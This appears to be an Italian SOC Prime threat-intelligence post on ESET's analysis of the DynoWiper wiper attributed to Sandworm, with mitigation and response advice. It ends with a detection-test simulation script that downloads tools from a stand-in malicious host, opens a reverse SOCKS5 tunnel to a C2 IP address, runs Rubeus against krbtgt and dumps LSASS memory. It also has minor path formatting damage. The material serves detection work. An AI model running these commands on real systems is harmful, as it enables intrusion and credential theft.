SOC Prime Bias: Critico

04 Feb 2026 15:19 UTC

Aggiornamento di DynoWiper di ESET Research: Analisi tecnica e attribuzione

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
Aggiornamento di DynoWiper di ESET Research: Analisi tecnica e attribuzione
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sintesi

DynoWiper è un wiper distruttivo utilizzato contro un’organizzazione del settore energetico in Polonia, con impatto su più endpoint durante le operazioni. Gli eseguibili sono stati preparati in una posizione di rete condivisa e avviati direttamente da essa. ESET attribuisce l’attività a Sandworm con una fiducia media. Una volta eseguito, il malware corrompe i file mirati con byte casuali e innesca un riavvio forzato per completare l’impatto.

Indagine

ESET ha recuperato tre campioni: schtask.exe, schtask2.exe e _update.exe, rilasciati sotto C:inetpubpub. I percorsi PDB incorporati suggeriscono che i binari siano stati compilati in un ambiente Vagrant. L’ingegneria inversa ha rivelato una routine di cancellazione a tre fasi, con due varianti che inseriscono una pausa di cinque secondi tra le fasi. Gli artefatti post-compromise includevano anche lo strumento Kerberos Rubeus e un proxy rsocx SOCKS5 all’interno della rete della vittima.

Mitigazione

ESET PROTECT nei sistemi delle vittime ha bloccato tutte e tre le varianti, limitando i danni. Ridurre l’esposizione prevenendo la creazione non autorizzata di attività pianificate e monitorando le scritture inaspettate nelle directory condivise. Aggiungere elenchi di permessi delle applicazioni e vietare l’esecuzione da condivisioni di rete dove possibile.

Risposta

Identificare e isolare gli host che eseguono schtask.exe, schtask2.exe o *_update.exe da una condivisione. Preservare le prove volatili, esaminare le attività pianificate e le tracce di distribuzione di PowerShell, e rimuovere strumenti come Rubeus e rsocx. Completare una piena analisi forense e ripristinare i dati da backup puliti verificati.

Flusso di Attacco

Esecuzione Simulazione

Prerequisito: Il Check Preflight di Telemetria & Base deve essere passato.

Razionale: Questa sezione dettaglia l’esatta esecuzione della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente le TTP identificate e mirare a generare esattamente la telemetria attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrativa & Comandi dell’Attacco:

    1. Stabilire un proxy SOCKS5 inverso utilizzando rsocx.exe. L’avversario scarica il binario da un server esterno, lo posiziona in %TEMP%, ed esegue il comando con l’argomento -r 31.172.71.5:8008 per creare un tunnel inverso verso l’host C2.
    2. Eseguire abuso di ticket Kerberos con rubeus.exe. Lo strumento viene eseguito per richiedere un ticket di concessione del ticket Kerberos (TGT) per l’account amministratore del dominio e successivamente forgiare un ticket di servizio (s4u2self).
    3. Eseguire dump della memoria di LSASS utilizzando procdump.exe (una comune alternativa a Task Manager) per catturare il materiale delle credenziali. Sysmon registra un evento di Accesso al Processo dove il processo dell’attaccante procdump.exe accede a lsass.exe con il mask di accesso concesso 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)Script di Test di Regressione:).
  • # ————————————————————- # Script di simulazione – attiva la regola Sigma per rsocx, rubeus, # e dump di LSASS. Eseguire con privilegi amministrativi. # ————————————————————- # 1. Distribuire rsocx.exe (proxy SOCKS5 inverso) $rsocxPath = “$env:TEMPrsocx.exe” Invoke-WebRequest -Uri “http://malicious.example.com/rsocx.exe” -OutFile $rsocxPath Start-Process -FilePath $rsocxPath -ArgumentList “-r 31.172.71.5:8008” -WindowStyle Hidden # 2. Distribuire rubeus.exe (abuso Kerberos) $rubeusPath = “$env:TEMPrubeus.exe” Invoke-WebRequest -Uri “http://malicious.example.com/rubeus.exe” -OutFile $rubeusPath Start-Process -FilePath $rubeusPath -ArgumentList “dump /service:krbtgt” -WindowStyle Hidden # 3. Eseguire dump di LSASS utilizzando procdump (richiede Sysinternals) $procdumpPath = “$env:TEMPprocdump.exe” Invoke-WebRequest -Uri “https://download.sysinternals.com/files/Procdump.zip” -OutFile “$env:TEMPprocdump.zip” Expand-Archive -Path “$env:TEMPprocdump.zip” -DestinationPath $env:TEMP -Force $procdumpExe = Get-ChildItem “$env:TEMP” -Recurse -Filter “procdump.exe” | Select-Object -First 1 if ($procdumpExe) { Copy-Item $procdumpExe.FullName $procdumpPath -Force Start-Process -FilePath $procdumpPath -ArgumentList “-ma lsass.exe $env:TEMPlsass.dmp” -Wait } Write-Host “Simulazione completata. Controllare SIEM per allarmi.”

    Comandi di Pulizia:
  • Cleanup Commands:

    # Terminare qualsiasi processo malevolo residuo
    Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Rimuovere i binari e i file di dump
    Remove-Item -Path "$env:TEMPrsocx.exe","$env:TEMPrubeus.exe","$env:TEMPprocdump.exe","$env:TEMPlsass.dmp" -Force -ErrorAction SilentlyContinue
    
    # Opzionalmente cancellare le directory di download temporanee
    Remove-Item -Path "$env:TEMPProcdump.zip","$env:TEMPprocdump" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "Pulizia completata."